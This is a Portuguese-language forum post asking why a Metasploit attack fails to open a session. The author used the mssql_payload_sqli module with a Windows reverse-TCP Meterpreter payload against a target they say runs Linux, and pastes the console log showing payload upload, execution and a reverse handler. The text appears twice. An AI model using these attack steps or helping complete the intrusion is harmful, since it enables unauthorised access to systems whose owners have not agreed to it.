Atualmente to tentando acessar um alvo que está vulneravel.
Tô usando o exploit: (mssql_payload_sqli)
Junto com o payload: windows/patchupmeterpreter/reverse_tcp
Só que quando eu inicio, ocorre tudo bem, só não abre a sessão:
Logs:
Alguem sabe a solução?
PS: O Alvo é linux.
Thanks.
Tô usando o exploit: (mssql_payload_sqli)
Junto com o payload: windows/patchupmeterpreter/reverse_tcp
Só que quando eu inicio, ocorre tudo bem, só não abre a sessão:
Logs:
[*] Started reverse TCP handler on 192.168.0.11:15311 [*] Warning: This module will leave dRkiDtiW.exe in the SQL Server %TEMP% directory[*] Writing the debug.com loader to the disk...[*] Converting the debug script to an executable...[*] Uploading the payload, please be patient...[*] Converting the encoded payload...[*] Executing the payload...[*] Almost there, the stager takes a while to execute. Waiting 50 seconds...[*] Exploit completed, but no session was created.
Alguem sabe a solução?
PS: O Alvo é linux.
Thanks.
Comment